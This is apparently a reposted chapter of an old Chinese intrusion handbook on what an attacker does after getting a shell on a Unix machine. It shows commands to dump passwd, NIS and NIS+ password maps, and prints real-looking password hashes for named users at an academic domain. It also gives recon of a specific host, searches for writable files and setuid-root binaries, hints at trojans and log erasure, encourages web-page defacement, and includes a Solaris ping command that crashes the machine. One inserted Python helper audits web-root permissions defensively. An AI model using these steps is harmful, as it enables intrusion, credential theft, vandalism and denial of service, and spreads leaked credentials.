Practical Tactics Handbook for Network Intrusion (5)

    Author: [samsa]


    IV. Breaking and Entering

    Once you have a shell (even an ordinary user's) on the target machine, there is a lot more you can do.

    1) /etc/passwd, /etc/shadow

    Read it if you can, take it if you can, crack it if you can.

    1.1) Directly (no NIS)

    $ cat /etc/passwd
    ......
    ......

    1.2) NIS (yp: yellow pages)

    $ domainname
    cas.ac.cn
    $ ypwhich -d cas.ac.cn
    $ ypcat passwd

    1.3) NIS+

    ox% domainname
    ios.ac.cn
    ox% nisls
    ios.ac.cn:
    org_dir
    groups_dir
    ox% nisls org_dir
    org_dir.ios.ac.cn.:
    passwd
    group
    auto_master
    auto_home
    bootparams
    cred
    ethers
    hosts
    mail_aliases
    sendmailvars
    netmasks
    netgroup
    networks
    protocols
    rpc
    services
    timezone
    ox% niscat passwd.org_dir
    root:uop5Jji7N1T56:0:1:Super-User:/:/bin/csh:9841::::::
    daemon:NP:1:1::/::6445::::::
    bin:NP:2:2::/usr/bin::6445::::::
    sys:NP:3:3::/::6445::::::
    adm:NP:4:4:Admin:/var/adm::6445::::::
    lp:NP:71:8:Line Printer Admin:/usr/spool/lp::6445::::::
    smtp:NP:0:0:Mail Daemon User:/::6445::::::
    uucp:NP:5:5:uucp Admin:/usr/lib/uucp::6445::::::
    listen:*LK*:37:4:Network Admin:/usr/net/nls::::::::
    nobody:NP:60001:60001:Nobody:/::6445::::::
    noaccess:NP:60002:60002:No Access User:/::6445::::::
    guest:NP:14:300:Guest:/hd2/guest:/bin/csh:10658::::::
    syscd:qkPu7IcquHRRY:120:10::/usr/syscd:/bin/csh:::::::
    peif:DyAkTGOg/2TCY:819:800:Pei Fei:/home/peif:/bin/csh:10491::::::
    lxh:T4FjqDv0LG7uM:510:500:Liu Xuehui:/home/lxh:/bin/csh:10683::::::
    fjh:5yPB5xLOibHD6:507:500:Feng Jinhui:/home/fjh:/bin/csh:10540::::::
    lhj:UGAVVMvjp/9UM:509:500:Li Hongju:/home/lhj:/bin/csh:10142::::::
    ....

    (samsa: gotcha!!!)

    2) Looking for system vulnerabilities

    2.0) Gathering information

    ox% uname -a
    SunOS ox 5.5 Generic sun4d sparc SUNW,SPARCserver-1000
    ox% id
    uid=820(ywc) gid=800(ofc)
    ox% hostname
    ox
    ox% domainname
    ios.ac.cn
    ox% ifconfig -a
    lo0: flags=849 mtu 8232
    inet 127.0.0.1 netmask ff000000
    be0: flags=863 mtu 1500
    inet 159.226.5.188 netmask ffffffc0 broadcast 159.226.5.191
    ipd0: flags=c0 mtu 8232
    inet 0.0.0.0 netmask 0
    ox% netstat -rn
    Routing Table:
    Destination Gateway Flags Ref Use Interface
    -------------------- -------------------- ----- ----- ------ ---------
    127.0.0.1 127.0.0.1 UH 0 738 lo0
    159.226.5.128 159.226.5.188 U 3 341 be0
    224.0.0.0 159.226.5.188 U 3 0 be0
    default 159.226.5.189 UG 0 1198
    ......

    2.1) Looking for writable files and directories

    ox% cd /tmp
    ox% mkdir .hide
    ox% cd .hide
    ox% ls -ld `find / \( \( -type d -o -type f \) -a \( -perm -0002 -o -group 800 \
    -a -perm -0020 \) \) -print` >.wr

    (samsa: wr = writables: writable directories and files)

    ox% grep "^d" .wr > .wd

    (samsa: wd = writable directories)

    ox% grep "^-" .wr > .wf

    (samsa: wf = writable files: regular files)

    ox% ls -l `find / \( -perm -4000 -a -user root \) -print` >.sr

    (samsa: sr = suid roots: setuid-root binaries)

    2.1.1) Writable system configuration files: e.g. pam.conf, inetd.conf, inittab, passwd, etc.
    2.1.2) Writable bin directories: e.g. /usr/bin, /usr/local/bin, etc. (see: Trojan horses)
    2.1.3) Writable log files: e.g. /var/adm/wtmp, /var/adm/messages, etc. (for track-erasing)

    2.2) Defacing the home page

    On the vast majority of systems the permissions under the http root directory are set wrongly! If you don't believe it, look:

    ox1% grep http /etc/inetd.conf
    ox1% ps -ef | grep http
    http 7538 251 0 14:02:35 ? 0:02 /opt/home1/ofc/http/httpd/httpd -f /opt/home1/ofc/http/httpd/conf/httpd.conf
    http 7567 251 0 15:16:46 ? 0:01 /opt/home1/ofc/http/httpd/httpd -f /opt/home1/ofc/http/httpd/conf/httpd.conf
    root 251 1 0 May 05 ? 3:27 /opt/home1/ofc/http/httpd/httpd -f /opt/home1/ofc/http/httpd/conf/httpd.conf
    ......
    ox1% cd /opt/home1/ofc/http/httpd
    ox1% ls -l |more
    total 530
    drwxrwxrwx 11 http ofc 512 Jan 18 13:21 English
    -rw-rw-rw- 1 http ofc 8217 May 10 09:42 Welcome.html
    drwxr-sr-x 2 http ofc 512 Dec 24 15:20 cgi-bin
    drwxr-sr-x 2 http ofc 512 Mar 24 1997 cgi-src
    drwxrwxrwx 2 http ofc 512 Jan 12 15:05 committee
    drwxr-sr-x 2 root ofc 512 Jul 2 1998 conf
    -rwxr-xr-x 1 http ofc 203388 Jul 2 1998 httpd
    drwxrwxrwx 2 http ofc 512 Jan 12 15:06 icons
    drwxrwxrwx 2 http ofc 3072 Jan 12 15:07 images
    -rw-rw-rw- 1 http ofc 7532 Jan 12 15:08 index.htm
    drwxrwxrwx 2 http ofc 512 Jan 12 15:07 introduction
    drwxr-sr-x 2 http ofc 512 Apr 13 08:46 logs
    drwxrwxrwx 2 http ofc 1024 Jan 12 17:19 research

    (samsa: Ha ha!! Almost all of it is writable. Impressive. Go ahead and change it, what are you waiting for??)
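    As an added audit helper (not part of samsa's article), the following parses an `ls -l` listing like the one above and reports every entry that someone other than its owner, or the daemon's own account, can modify; this is the check an administrator would run over a served web root. The sample listing is copied from the article; `server_user` is an assumed parameter naming the account the httpd runs as.

```python
import re
from typing import Dict, List, Optional

# One `ls -l` line: mode, link count, owner, group, size, 3 date tokens, name.
LS_LINE = re.compile(
    r"^([-dlbcps][rwxsStT-]{9})\s+\d+\s+(\S+)\s+(\S+)\s+\d+\s+\S+\s+\d+\s+\S+\s+(.+)$"
)

# Constructed sample: a subset of the web-root listing shown in the article.
SAMPLE_LISTING = """total 530
drwxrwxrwx 11 http ofc 512 Jan 18 13:21 English
-rw-rw-rw- 1 http ofc 8217 May 10 09:42 Welcome.html
drwxr-sr-x 2 http ofc 512 Dec 24 15:20 cgi-bin
drwxr-sr-x 2 root ofc 512 Jul 2 1998 conf
-rwxr-xr-x 1 http ofc 203388 Jul 2 1998 httpd
-rw-rw-rw- 1 http ofc 7532 Jan 12 15:08 index.htm
drwxr-sr-x 2 http ofc 512 Apr 13 08:46 logs
"""

def parse_ls_line(line: str) -> Optional[Dict[str, str]]:
    """Mode/owner/group/name for one `ls -l` line; None for 'total' lines."""
    m = LS_LINE.match(line.strip())
    return dict(zip(("mode", "owner", "group", "name"), m.groups())) if m else None

def audit_entry(entry: Dict[str, str], server_user: Optional[str] = None) -> List[str]:
    """Who, besides the owner, can modify this entry.  Mode string index:
    0 type, 1-3 user bits, 4-6 group bits, 7-9 other bits."""
    mode, issues = entry["mode"], []
    if mode[8] == "w":  # 'other' write bit: anyone with a local shell
        issues.append("world-writable")
    if mode[5] == "w":  # group write bit
        issues.append(f"group-writable by {entry['group']}")
    if server_user and entry["owner"] == server_user and mode[2] == "w":
        # Content owned by the daemon's own account: a server or CGI bug
        # lets the daemon rewrite what it publishes.
        issues.append(f"owner-writable by the server account {server_user}")
    return issues

def audit_listing(text: str, server_user: Optional[str] = None) -> List[Dict[str, object]]:
    """Audit a whole `ls -l` listing; keep only entries that have issues."""
    report: List[Dict[str, object]] = []
    for line in text.splitlines():
        entry = parse_ls_line(line)
        issues = audit_entry(entry, server_user) if entry else []
        if issues:
            report.append({"name": entry["name"], "mode": entry["mode"], "issues": issues})
    return report
```

    In the sample, only `conf` (owned by root, no group or other write bit) comes back clean; everything else is modifiable either by any local user, by the `ofc` group, or by the `http` account the server itself runs as.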

    3) Denial of Service (DoS)

    Use system vulnerabilities to cause havoc.

    e.g. on Solaris 2.5 (2.5.1):

    $ ping -sv -i 127.0.0.1 224.0.0.1
    PING 224.0.0.1 56 data bytes

    (samsa: and then the machine reboots, heh heh)

    Posted by: netbull  Source: 黑客专家